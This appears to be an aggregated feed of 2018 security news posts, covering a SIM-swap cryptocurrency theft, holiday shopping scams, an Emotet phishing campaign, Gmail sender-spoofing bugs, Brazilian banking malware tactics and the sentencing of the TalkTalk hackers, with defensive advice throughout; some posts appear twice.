“San Francisco resident Robert Ross, a father of two, noticed his phone suddenly lose its signal on Oct. 26. Confused, he went to a nearby Apple store and later contacted his service provider, AT&T. But he wasn’t quick enough to stop a hacker from draining $500,000 from two separate accounts he had at Coinbase and Gemini, according to Santa Clara officials.” reads a CNBC report.

“Nicholas Truglia, 21, lifted the $1 million from Ross’ two cryptocurrency accounts, according to a felony complaint filed this month in California state court. “

The man has been charged with a total of 21 crimes, including identity theft, fraud, embezzlement, and attempted grand theft. although his attempts to rob them ultimately failed.

Police raided the Truglia’s house under a warrant and able to recover $300,000 worth of cryptocurrency from his hardware wallet. At the time, there is no news about the remaining amount of money stolen by the man.

“It’s a whole new wave of crime,” said Erin West, the deputy district attorney of Santa Clara County. “It’s a new way of stealing of money: They target people that they believe to have cryptocurrency,” she told CNBC.

A SIM swap fraud is a type of fraud that overwhelms the additional security measures introduced by banks to protect customer transactions. Basically, cyber criminals are able to transfer cash from a victim’s account by accessing one-time pin codes and SMS notifications.

Attacker impersonates the victim to request the mobile provider’s tech support staff into reassigning the victim’s phone number to a SIM card owned by the crook. The procedure needs the attacker will answer a few security questions to verify the victim’s identity. Typically the attacker gathers the information to respond the questions through social engineering or through OSINT activities.

According to the court documents, Truglia also targeted Saswata Basu, the CEO of blockchain storage service 0Chain; Myles Danielson, a hedge-fund executive, and Gabrielle Katsnelson, co-founder of start-up SMBX.

Pierluigi Paganini

(Security Affairs – SIM swap, hacking)

The post Hacker stole $1m from Silicon Valley executive via SIM swap appeared first on Security Affairs.

McAfee Blogs: 8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Download a free password manager, which auto-saves and enters your passwords, so you don’t have to. The True Key app protects your passwords by scrambling them with AES-256, one of the most robust encryption algorithms available.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL; it’s design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.



McAfee Blogs

8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Download a free password manager, which auto-saves and enters your passwords, so you don’t have to. The True Key app protects your passwords by scrambling them with AES-256, one of the most robust encryption algorithms available.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL; it’s design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.

Beware Black Friday & Cyber Monday shoppers: fake products, credit cards scams and other types of fraud

Group-IB security experts are warning about the increasing scammers’ activity during the Black Friday and Cyber Monday Sales

Group-IB, an international company that specializes in preventing cyber attacks, warns about the increasing scammers’ activity during the Black Friday and Cyber Monday Sales. Group-IB experts have discovered more than 400 website-clones of the popular marketplace AliExpress and roughly 200 fake websites of famous brands and online stores. These websites aim to sell counterfeit products, steal money or credit cards information.

Black Friday counterfeit goods

Fake leather bags, sunglasses, sportswear, electronics and perfumes pose risks to consumers. Long Beach press conference. Photo by Brad Graverson 11-28-14

AliExpress and its 400 clones             

The Black Friday Sale – is a favorite time of the year for not only bargain hunters chasing the best deals, but also for online scammers chasing a quick buck. They create website-clones of famous brands and online stores long before the Black Friday starts. For instance, Group-IB discovered around 400 bogus AliExpress websites that appear to be legitimate. To attract customers fraudsters create fake websites that look almost identical to the legitimate ones: they copy branding, logo, fonts and even register a similar domain name to mislead the visitors. Most of the analyzed fraudulent websites had many variations of AliExpress legitimate URL. The damage to one customer can reach up to hundreds of dollars. Such fake websites are capable of luring up to 200 000 monthly visitors.

Just one group of scammers is capable of creating hundreds of bogus websites. Not long before the Black Friday Sale Group-IB Brand Protection team detected a network of 198 fake websites that illegally used famous brands’ trademarks. Most of the domain names were purchased in August 2018, and all the content – photos, product descriptions, and prices – was copied from the legitimate website. It is worth noting that all these fake websites had the same hosting provider — ISPIRIA Networks Ltd, located in Belize (Central America). Scammers create fake websites to advertise and sell counterfeit goods, such as computers and electronics, clothing, jewelry, accessories, beauty and personal care products and even medicine usually with discounts that reach 80%.  Sometimes fraudsters advertise and sell non-existent products. For example, one of the fake websites offers to buy «Red Dead Redemption 2» for PC, while the most anticipated game of 2018 was only released for PlayStation 4 and Xbox One.

Phishing: 1274 attacks a day          

Another type of fraud that pose a serious threat to customers is phishing websites that are looking to steal money or personal information (login credentials or credit card details). According to Group-IB Brand Protection experts, 1274 phishing attacks are carried out daily. In total the average monthly revenue of phishing websites, designed to closely resemble the legitimate brands’ trademarks, is amounted to 45,600 USD.

Fraudsters use legitimate promotion channels to increase their website traffic: mass mailing via messengers, banner ads, SEO and paid social media campaigns. Fraudsters quite often buy domain names that mimic the legitimate brands’ websites addresses and then redirect users to different webpages. If you click on such link, you end up on a completely different website.

“The consequences of such fraud can be both direct financial losses and collateral, such as damage to the reputation. According to statistics, 64% of users stop buying a company’s products after one negative experience. In the cybersecurity framework, the websites-clones should be considered not only as a threat to the customers, but also to the company. Detecting fraudulent websites should be a systemic activity for big brands,” – comments Andrey Busargin, Director of Brand Protection and Anti-Piracy at Group-IB.

How to avoid online scammers: protect your brand & secure your wallet

Group-IB’s experts remind about basic “cyber hygiene” not to become a cyber criminals’ victim:

For brands:

1.       Purchase all similar domain names so that cyber criminals could not use your trademark in the fake website’s domain name. For example, if your address is internet-shop.ru, cybercriminals can register the following domain names: internet.shop.ru or internet shop.ru and act on behalf of your brand.

2.       Monitor references to your brand in the domain names and phishing websites databases regularly. Companies that provide brand protection and anti-fraud services on the Internet have access to these databases.

3.       Look for the criminals who use your brand in search engines. Search requests should be sent from different geo locations and devices in order to have most objective search output.

4.       Keep track of the promotion techniques of fraudulent resources: context ads, posts in social networks and messengers.

5.       Discover the network of fraudulent websites that use your brand. Usually, cyber criminals create several website clones. They can be detected using the websites affiliation technologies that automatically detect the links between fraudulent resources.

6.       Monitor mobile apps both in the official and unofficial stores, including forums, search engines, social networks and websites where they get distributed.

7.       Constantly monitor the use of your brand and company management names in social media.

8.       Block fraudulent resources that cause reputational and financial damage to your brand. Seek out the experts.

For customers:

1.       First, always pay attention to the URL in the browser.
2.       If the website name contains a few dots, for example (*con.su.club), it is better not to order anything from such website. Check an official site via web search.
3.       Check the date of when the website was created. In order to do this use free WHOIS-services where you can find the registration date and information on the owner of the domain (fraudulent websites are newly created, usually days before the big sales).
4.       Do not trust malfunctioning websites, the official website should work correctly even at peak load.
5.       Do not purchase from unauthorized resellers.
6.       Do not click on the links in articles dedicated to discounts.
7.       Have a separate payment card for online shopping and do not type in your card data on suspicious websites. At the end of the day, it is better not to buy a product rather than lose all the money from your bank card.

About the Author: Group-IB Corporate Communications 

http://www.group-ib.ru

https://www.group-ib.ru/blog/

telegram | facebook | twitter | linkedin

Pierluigi Paganini

(Security Affairs – Black Friday, Cybercrime)

The post Beware Black Friday & Cyber Monday shoppers: fake products, credit cards scams and other types of fraud appeared first on Security Affairs.

New Emotet Thanksgiving campaign differs from previous ones

Researchers from Forcepoint observed a new Emotet Thanksgiving-themed campaign that appears quite different from previous ones.

Security researchers from Forcepoint have observed a new Emotet Thanksgiving-themed campaign that appears quite different from previous ones.

EMOTET, aka Geodo, is a banking trojan linked to the dreaded Dridex and Feodo (CridexBugat)  malware families.

In past campaigns, EMOTET was used by crooks to steal banking credentials and as a malicious payload downloader.

According to the experts, the Thanksgiving-themed campaign targeted U.S. users this week.

“After a hiatus of some weeks, we observed Emotet returning in mid-November with upgraded macro obfuscation and formatting.  On 19 November, it began a US-centric Thanksgiving-themed campaign. As many will know this is a departure from the standard financial themes regularly seen.” reads the analysis published by Forcepoint.

The new campaign leverages an improved variant of the malware that implements new features and modules, experts pointed out that this is the first campaign that doesn’t use financial themes.

The crooks behind the recent Emotet campaign sent out roughly 27,000 messages daily, below a sample of the Thanksgiving-themed message:

Emotet

The attachment is an XML file masquerading as a .doc with embedded macros leading to a standard PowerShell downloader normally observed with Emotet banking Trojan, which is also used by crooks to drop other payloads.

“However, the document in this case is not the usual .doc or .docx but rather an XML file masquerading as a .doc, and the macro in this instance makes use of the Shapes feature, ultimately leading to the calling of the shell function using a WindowStyle of vbHide.” continues the expert.

The macro has been recently evolved from the Emotet pattern, in implements upgraded macro obfuscation and formatting.

“In the few weeks since Emotet returned it has undergone some interesting changes, most notably in the new Thanksgiving theme and macro obfuscation discussed previously.” concludes Forcepoint.

“Whilst not completely novel (use of XML files to conceal macros was reported by Trustwave back in 2015) it does pose a challenge to defenders due to the sheer volume of emails sent, as detection signatures need to be rapidly created to stem the onrushing tide.”

Further details, including IoCs are reported in the analysis published by the experts.

Pierluigi Paganini

(Security Affairs – banking trojan, spam)

 

The post New Emotet Thanksgiving campaign differs from previous ones appeared first on Security Affairs.

Spoofed addresses and anonymous sending: new Gmail bugs make for easy pickings

Tim Cotten, a software developer from Washington, DC, was responding to a request for help from a female colleague last week, who believed that her Gmail account has been hacked, when he discovered something phishy. The evidence presented was several emails in her Sent folder, purportedly sent by her to herself.

Cotten was stunned when, upon initial diagnosis, he found that those sent emails didn’t come from her account but from another, which Gmail—being the organized email service that it is—only filed away in her Sent folder. Why would it do that if the email wasn’t from her? It seems that while Google’s filtering and organizing technology worked perfectly, something went wrong when Gmail tried to process the emails’ From fields.

This trick is a treat for phishers

Cotten noted in a blog post that the From header of the emails in his coworker’s Sent folder contained (1) the recipient’s email address and (2) another text—usually a name, possibly for increased believability. The presence of the recipient’s address caused Gmail to move the email to the Sent folder while also disregarding the email address of the actual sender.

Weird “From” header. Screenshot by Tim Cotten, emphasis (in purple) ours.

Why would a cybercriminal craft an email that never ends up in a victim’s inbox? This tactic is particularly useful for a phishing campaign that banks on the recipient’s confusion.

“Imagine, for instance, the scenario where a custom email could be crafted that mimics previous emails the sender has legitimately sent out containing various links. A person might, when wanting to remember what the links were, go back into their sent folder to find an example: disaster!” wrote Cotten.

Cotten provided a demo for Bleeping Computer wherein he showed a potentially malicious sender spoofing the From field by displaying a different name to the recipient. This may yield a high turnover of victims if used in a business email compromise (BEC)/CEO fraud campaign, they noted.

After raising an alert about this bug, Cotten unknowingly opened the floodgates for other security researchers to come forward with their discovered Gmail bugs. Eli Grey, for example, shared the discovery of a bug in 2017 that allowed for email spoofing, which has been fixed in the web version of Gmail but remains a flaw in the Android version. One forum commenter claimed that the iOS Mail app also suffers from the same glitch.

Another one stirs the dust

Days after publicly revealing the Gmail bug, Cotten discovered another flaw wherein malicious actors can potentially hide sender details in the From header by forcing Gmail to display a completely blank field.

Who’s the sender? Screenshot by Tim Cotten, emphasis (in purple) ours.

He pulled this off by replacing a portion of his test case with a long and arbitrary code string, as you can see below:

The string. Screenshot from Tim Cotten, emphasis (in purple) ours.

Average Gmail users may struggle to reveal the true sender because clicking the Reply button and the “Show original” option still yields a blank field.

Screenshot by Tim Cotten, emphasis (in purple) ours.

There’s nothing there! Screenshot by Tim Cotten, emphasis (in purple) ours.

Missing sender details could potentially increase the possibility of users opening a malicious email to click an embedded link or open an attachment, especially if it contains a subject that is both actionable and urgent.

When met with silence

The Gmail vulnerabilities mentioned in this post are all related to user experience (UX), and as of this writing, Google has yet to address them. (Cotten has proposed a possible solution for the tech juggernaut.) Unfortunately, Gmail users can only wait for the fixes.

Spotting phishing attempts or spoofed emails can be tricky, especially when cybercriminals are able to penetrate trusted sources, but a little vigilance can go a long, long way.

The post Spoofed addresses and anonymous sending: new Gmail bugs make for easy pickings appeared first on Malwarebytes Labs.

Easy Does It! A Timely Look Into Fraud TTPs in the Brazilian Financial Cybercrime Landscape

Financial cybercrime in Brazil is known as one of the most geospecific panoramas, where local cybercriminals attack local internet users. With close to 210 million residents in the country, criminals are in lavish turf. Some reports cite losses of nearly 70 billion Brazilian reals — which equates to about $18.6 billion — to fraud and online scams in 2017.

In following the evolution of cyber activity in Brazil, IBM Security sees this threat landscape as unique, where technical sophistication is neither the norm nor a requirement. In this first article of a two-part series, we expose some of our recent research on the typical malware and tactics, techniques and procedures (TTPs) used against Brazilian online banking users.

In contrast to rising sophistication in other parts of the globe, one of the most poignant characteristics of cybercrime in Brazil is its simplicity. Attackers will often use their familiarity with how local users browse the internet to take advantage of them and steal their money.

Internet Access Spreads Far and Wide in Brazil, But User Education Is Still Scarce

The majority of global internet users are located in East and South Asia, and China is the largest online market in the world. Fourth on the global chart, Brazil is the largest internet market in Latin America, with nearly 140 million internet users as of 2016, according to Statista.

Internet access has grown rapidly in Brazil in the past decade, with nearly 77 percent of residents accessing the internet from home in some of the more populated regions of the country.

Brazil malware landscape

Figure 1: A regional estimate of the percentage of homes with internet access in Brazil (Source: The Brazilian Institute of Geography and Statistics)

However, while more Brazilians than ever before have access to internet-enabled services, many users are still not well-versed in using them safely. Regardless of the browser or search engine, it’s not unusual for internet users to look up something they want to access and click the first result without thinking twice about it. When it comes to online banking, for example, some may not take the time to type their bank’s URL into the address bar and favor searching for it, then browsing to the top result they get back. Fraudsters rely on this behavior and serve up poisoned links as the top results on a search engine to trap those who are unaware of the risks.

When the Going Gets Tough…Become a Cybercriminal?

The drivers of crime in Brazil stem from socio-economic difficulty. In addition, laws are either nonexistent or not strict enough to deter people from becoming online thieves.

The minimum wage in Brazil stands at 969 reals (around $258) per month, as reported by The Rio Times. Brazilian Institute of Geography and Statistics (IBGE) data from 2017 shows that “more than 50 million Brazilians, nearly 25 percent of the population, live below the poverty line, and have family incomes of R$387.07 per month.”

Many Brazilians have never had it easy when it comes to their socio-economic situations. Since necessity is the mother of invention, that reality is also what makes Brazilians quite creative in problem solving. In many cases, the main problem for everyday people in Brazil is the lack of financial resources to sustain themselves and their families. That’s where creative thinking comes into play — sometimes in good ways and, unfortunately, sometimes in the shape of financial cybercrime.

Remote Overlay Malware Is the Way to Go

Financial threats targeting online banking users in Brazil are a rather monotonous bunch. Most code is based on overlay malware and written in the Delphi programming language — code that is neither elaborate nor modular. Why spend a chunk of money buying or building state-of-the-art malware, wrapping it up in end-to-end encryption and enabling it to gain rootkit privileges on devices, when you only need simple malware to trick users into unwittingly giving up their credentials?

With evolving controls that curb attackers’ ability to use phished credentials, using malware is the preferred method in Brazil, offering a better return on investment for less effort. But how are everyday fraudsters operating the malware supply chain without much technical savvy? That’s where creative thinking and being local come into play. It is also why so many fraudsters in Brazil use very similar malware codes that do mostly the same things — namely, remote overlay.

As its name suggests, remote overlay involves remotely plastering fake images and application interfaces on users’ screens to limit their access to an authenticated online banking session and trick them into divulging additional information. This type of malware is by far the most common used in Brazil nowadays, and threat actors have little reason to change it.

Brazilian Fraudsters Don’t Complicate Things When Easy Does It

Using malware is one thing, but first, it has to reach unsuspecting users. Without technical know-how, most Brazilian fraudsters do not operate exploit kits, which can be costly and often require technical support from cybercrime vendors. Recent attacks that our team analyzed show that most attackers prefer victims to come to them by putting a consumer spin on the watering hole attack tactic.

In Brazil, residents can download their monthly invoices and tax bills from the corresponding vendor’s website or government site. It is common practice for people to log in to an online utility account, for example, and download their bill. By setting up a malicious replica of such a site, criminals can attract a large number of users to that page and trick them into downloading a fake bill, thereby having them willingly fetch a Trojanized file and unknowingly launch the malware infection on their devices.

But without using an exploit kit or relying on high-traffic sites, how will that malicious infection zone become known to potential victims? Knowing that many people in Brazil are in the habit of searching for websites via search engines rather than typing their exact URL into the address bar, the obvious choice is to pay for a sponsored advertisement to have the malicious page top the search results. To keep their own identities out of sight, cybercriminals pay for sponsored ads with stolen credit card information, saving themselves both money and risk.

Posting malicious ads on popular search engines is no stroke of genius, but a surefire way to get those ads discovered by security controls and promptly taken down. Fraudsters using this tactic therefore rely on short, aggressive bouts of luring people to their phishing pages. Since they do not pay for the ads and can spin up a malicious page very quickly, they can still get enough clicks to make each attack worthwhile.

To further protect their malicious site for a long enough period to trap as many users as possible, fraudsters often use stolen payment cards to pay for legitimate services that optimize their site’s performance and mitigate the risk of a distributed denial-of-service (DDoS) attack.

Phising site in Brazil uses DDoS protection

Figure 2: Phishing site data on Virus Total

Malicious website public data

Figure 3: Phishing site uses DDoS protection

IBM X-Force noted that recent campaigns that spread malware using sponsored URLs were carefully targeted by focusing on a specific region on specific days. For example, these campaigns often impersonate a state’s power company around the due date of that month’s bill, exploiting the timely context for visitors trying to pay their invoice to infect victims with remote overlay Trojans.

As users attempt to download their invoices, they are actually accessing a ZIP file containing a shortcut file (.LNK) used by Microsoft Windows to point to an executable file. That file will then download additional malware components to infect the user’s device. Victims would only see a file that opens to nothing and may attempt to download the file again, which our researchers witnessed in many cases.

Need Help With Your Attack Campaign?

When it comes to financial cybercrime, technical sophistication, while not entirely absent, is not very common in the Brazilian threat landscape. In many cases, cybercriminals in the region are newcomers to the trade and need help to become familiar with the works of online fraud.

To fill in the gaps, these newcomers receive assistance from other criminals in the shape of tutorials, lessons, tools and wares to help them along — a marketplace that’s comparable to other dark web and underground forums across the globe.

In the images below, we can see that selling information and tools is a dynamic business in Brazil. Each of the following screen captures shows commodities offered to fraudsters, including compromised data, web resources and platforms to launch attacks, blackhat lead generation help, and cash-out services. The same types of vendors also offer malware for sale.

Brazil fraudster underground Brazilian fraudster service Brazilian fraud services Brazil fraud services

Figure 4: Cybercriminals often offer services and commodities to help other criminals along.

Dark web marketplaces spread knowledge and train more criminals on fraud tactics. Localized cybercrime ecosystems are more targeted, which boosts their efficiency and adverse effects.

A Word to the Wise: Top Tips for Safer Web Browsing

While it is easy for Brazilian users to get infected with malware, infections cannot occur without user interaction. This is in contrast to other parts of the world, where people can often get infected simply by visiting a compromised page through a drive-by download from an exploit kit, for example.

Below are some consumer tips for safer browsing, adapted to the popular infection scenarios in Brazil:

  • Don’t search for the homepage of important accounts. Poisoned search engine results can easily lead users to a malicious page. For important accounts, especially those involving payments, type the URL into the address bar or save the genuine website in the browser’s favorites list and access it from there.
  • Double-check the site before downloading files. Before clicking to download an invoice, double-check the domain and its credentials — a malicious site might be written with a spelling mistake or use a different top-level domain (TLD).
  • Make sure the site is secure. Since the update to Hypertext Transfer Protocol Secure (HTTPS), all websites feature encryption. Look for a lock icon in the address bar and click it to see that you are in the right place. Most popular web browsers will alert users to a site that is not secured, or worse, dangerous to visit. If that’s the case, close the page and contact the service provider directly to pay a bill.
  • Get genuine security software for your devices. Even though regular antivirus software can take longer to detect new banking malware, it can offer some protection against known threats, which are what hits users most often. Use and update an antivirus program on your home and mobile devices.
  • Keep your operating system (OS) and all applications up to date. Cybercriminals can take advantage of bugs and flaws in unpatched systems to compromise or infect them with malware. Apply patches and updates as soon as they become available to limit vulnerability.
  • Stay away from counterfeit software. All major software vendors have one, if not many, application security teams. Anyone offering up counterfeit software goes to great lengths to bypass the original vendor’s controls and, as a result, counterfeit applications are often weaker and open up backdoors to devices. Stay away from counterfeit applications and favor open source or freeware programs if you cannot afford to buy original software.
  • Last, but not least: education. One of the most important ways to help prevent malware infections and online banking fraud is user education. While security controls can help mitigate risks, they can’t replace user vigilance. Organizations and service providers alike should offer information that can help users become more aware of attack tactics and the risks associated with them.

Malware is prolific, but with the right risk management solution, you can prevent fraud while establishing digital identity trust throughout your customer’s online journey.

The post Easy Does It! A Timely Look Into Fraud TTPs in the Brazilian Financial Cybercrime Landscape appeared first on Security Intelligence.

Conficker: A 10-year retrospective on a legendary worm

This November marked the 10-year anniversary of Conficker, a fast-spreading worm targeting Microsoft systems that went on to claim one of the highest levels of infection in history. Millions of computers were eventually infected by the worm, including hospitals across Europe as well as ordinary consumers. Looking back to my time helping to defeat the worm however, it is apparent that the outbreak also helped to elevate the security industry and shape many of the … More

The post Conficker: A 10-year retrospective on a legendary worm appeared first on Help Net Security.

The holiday season and cybercrime: 8 ways to protect yourself

The holiday season has become an unbridled online spending extravaganza, and threat actors have taken notice. For shoppers, what starts out as an attempt to fulfill their holiday shopping checklist for pennies on the dollar can turn into a financial nightmare. For brands, what begins as an event that significantly boosts sales can turn into a security fiasco that erodes the trust between them and their customers and prospects. Cyber Monday 2017 was the largest … More

The post The holiday season and cybercrime: 8 ways to protect yourself appeared first on Help Net Security.

Security Affairs: Two hackers involved in the TalkTalk hack sentenced to prison

Two men from Tamworth, Staffordshire were sentenced to prison for their roles in the 2015 TalkTalk hack.

Two men, Connor Allsopp, 21, and Matthew Hanley, 23, pleaded guilty to charges of hacking. Allsopp has been sentenced to 8 months in jail and Hanley to 12 months.

In October 2015, TalkTalk Telecom Group plc publicly disclosed that four million subscribers  have been impacted by a “sustained cyberattack” that hit its servers. The figures were downgraded later, the company revealed that only 156,959 customers were affected.

Hackers accessed to names, addresses, dates of birth, email addresses and phone numbers of the company customers, they also accessed financial data for 15,000 users.

Attackers also attempted to blackmail the telecoms TalkTalk CEO, Dido Harding.

“We have been contacted by, I don’t know whether it is an individual or a group purporting to be the hacker,” Dido Harding said to the BBC. “It is a live criminal investigation. All I can say is I have personally received a contact from someone purporting as I say…to be the hacker looking for money.”

The security breach had a significant impact on the company, overall losses have been estimated at £77 million ($99 million).

The U.K. Information Commissioner’s Office (ICO) handed a £400,000 ($510,000) record fine to TalkTalk for the data breach.

TalkTalk

Other people, were arrested after the TalkTalk security breach, most of them were youngsters.

In the weeks after the attack, the police arrested of a 15-year-old teen from Northern Ireland and a 16-year-old boy from Feltham.

In November 2015, another young hacker from Norwich was arrested by the British police.

Pierluigi Paganini

(Security Affairs – TA505, tRat)

The post Two hackers involved in the TalkTalk hack sentenced to prison appeared first on Security Affairs.



Security Affairs

Two hackers involved in the TalkTalk hack sentenced to prison

Two men from Tamworth, Staffordshire were sentenced to prison for their roles in the 2015 TalkTalk hack.

Two men, Connor Allsopp, 21, and Matthew Hanley, 23, pleaded guilty to charges of hacking. Allsopp has been sentenced to 8 months in jail and Hanley to 12 months.

In October 2015, TalkTalk Telecom Group plc publicly disclosed that four million subscribers  have been impacted by a “sustained cyberattack” that hit its servers. The figures were downgraded later, the company revealed that only 156,959 customers were affected.

Hackers accessed to names, addresses, dates of birth, email addresses and phone numbers of the company customers, they also accessed financial data for 15,000 users.

Attackers also attempted to blackmail the telecoms TalkTalk CEO, Dido Harding.

“We have been contacted by, I don’t know whether it is an individual or a group purporting to be the hacker,” Dido Harding said to the BBC. “It is a live criminal investigation. All I can say is I have personally received a contact from someone purporting as I say…to be the hacker looking for money.”

The security breach had a significant impact on the company, overall losses have been estimated at £77 million ($99 million).

The U.K. Information Commissioner’s Office (ICO) handed a £400,000 ($510,000) record fine to TalkTalk for the data breach.

TalkTalk

Other people, were arrested after the TalkTalk security breach, most of them were youngsters.

In the weeks after the attack, the police arrested of a 15-year-old teen from Northern Ireland and a 16-year-old boy from Feltham.

In November 2015, another young hacker from Norwich was arrested by the British police.

Pierluigi Paganini

(Security Affairs – TA505, tRat)

The post Two hackers involved in the TalkTalk hack sentenced to prison appeared first on Security Affairs.

Securelist: Kaspersky Security Bulletin: Threat Predictions for 2019

There’s nothing more difficult than predicting. So, instead of gazing into a crystal ball, the idea here is to make educated guesses based on what has happened recently and where we see a trend that might be exploited in the coming months.

Asking the most intelligent people I know, and basing our scenario on APT attacks because they traditionally show the most innovation when it comes to breaking security, here are our main ‘predictions’ of what might happen in the next few months.

No more big APTs

What? How is it possible that in a world where we discover more and more actors every day the first prediction seems to point in the opposite direction?

The reasoning behind this is that the security industry has consistently discovered highly sophisticated government-sponsored operations that took years of preparation. What seems to be a logical reaction to that situation from an attacker’s perspective would be exploring new, even more sophisticated techniques that are much more difficult to discover and to attribute to specific actors.

